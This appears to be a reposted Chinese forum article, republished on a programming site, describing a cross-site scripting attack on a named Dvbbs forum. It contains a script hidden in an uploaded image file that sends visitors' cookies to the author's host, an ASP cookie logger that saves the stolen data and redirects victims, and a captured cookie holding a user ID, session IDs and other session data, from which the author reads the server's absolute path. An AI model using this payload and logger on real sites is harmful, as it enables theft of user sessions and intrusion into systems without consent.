当前位置: 代码网 > it编程>编程语言>安全编程 > 关于动网的cookie泻露站点绝路径的问题

关于动网的cookie泻露站点绝路径的问题

2024年05月19日 安全编程 我要评论
一、跨站测试 先看看我的一次跨站测试吧 我以职业欠钱的站点做测试吧: host:zhiyeqianqian.51web.cn mytest: 先在他的论谈上传两张图, 图一的内容是: <scri
一、跨站测试
先看看我的一次跨站测试吧
我以职业欠钱的站点做测试吧:
host:zhiyeqianqian.51web.cn
my test:
先在他的论谈上传两张图,
图一的内容是:
<script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script>
得到url为uploadfile/2005-6/200562716565777847.jpg
图二则是偶的个人照
uploadfile/2005-6/200562716563048909.jpg
写个盗cookie的代码到我的空间,lcx的盗cookie代码有问题,所以修改了一下。
<%
cookiefile=server.mappath("cookie.txt")
set fs=server.createobject("scripting.filesystemobject")
set cookiefile=fs.opentextfile(cookiefile,8,true,0)
cookiefile.write(request.querystring&"<br>")
cookiefile.close
set fs = nothing
%>
<meta http-equiv="refresh" content="0;url= http://zhiyeqianqian.51web.cn/uploadfile/2005-6/200562716563048909.jpg">
接下来,点击图一,自动转到图二,

二、结果分析
再到我的空间看一下,抓到cookie如下:
msg=ewwwrootzhiyeqianqianwwwroot=userid=218&usercookies=1&statuserid=2190418138&password=想要吗?嘿嘿&userhidden=2&userclass=%d0%c2%ca%d6%c9%cf%c2%b7&username=linzi;%20aspsessionidqscaaqtb=hmplnimdhocdjkpelpgbboog;%20dvbbs;%20dvbbsmagicface=862;%20upnum=2;%20aspsessionidqsaaartb=jbppmonddegfgheoicdhfjim<br>
分析cookie我们不难看出他的绝对路径是e:\wwwroot\zhiyeqianqian\wwwroot


三、论谈
本来,最初的测试我是在测试bct论谈,成功暴出他的绝对路径,一开始的时候,我还认为可能又是动网出洞洞了,所以又去测试了其它几个站,测试结果是其它的站点并没有暴出路径,今天再次测试“欠我钱”的论谈,却又暴不出来,查了一下代码,和别人的代码一个样,根本没什么差别。
偶想听听大家的看法,到底是哪里出了问题,能不能深入利用~~~
(0)

相关文章:

  • Win32下病毒设计入门

    Win32下病毒设计入门

    win32下病毒设计入门 本文假定你对dos下的病毒和386pm有一定的了解。 1、感染任何一个病毒都需要有寄主,把病毒代码加入寄主程序中 (伴侣病毒除外)。 ... [阅读全文]
  • 角逐网络江湖—黑客兵器谱排名

    角逐网络江湖—黑客兵器谱排名

    纵横于黑客江湖,没几件称心兵器怎能立足?本栏目将不定期刊出黑客常用的重量级兵器,希望对读者朋友了解、学习网络安全技术有所指导。   no.1懂得用刀杀人并不困难... [阅读全文]
  • 网上保障隐私十大秘技

    网上保障隐私十大秘技

    互联网是一把两刃利剑,一方面为日常生活带来便利,另一方面又为黑客入侵电脑系统开放更多渠道。一般网友应如何防范?请看下面能保障你隐私的十大秘技:     1.采用... [阅读全文]
  • 自己动手清除电脑中的木马程序

    自己动手清除电脑中的木马程序

    特洛伊木马是一种基于远程控制的病毒程序,该程序具有很强的隐蔽性和危害性,它可以在你并不知情的的状态下控制你或者监视你的电脑。下面就讲讲木马经常藏身的地方和清除方... [阅读全文]
  • 黑客破解口令常用的三种方法

    黑客破解口令常用的三种方法

    通过破解获得系统管理员口令,进而掌握服务器的控制权,是黑客的一个重要手段。破解获得管理员口令的方法有很多,下面是三种最为常见的方法。   (1)猜解简单口令:很... [阅读全文]
  • 黑客秘籍:Windows下权限设置

    黑客秘籍:Windows下权限设置

    随着动网论坛的广泛应用和动网上传漏洞的被发现以及sql注入式攻击越来越多的被使用,webshell让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com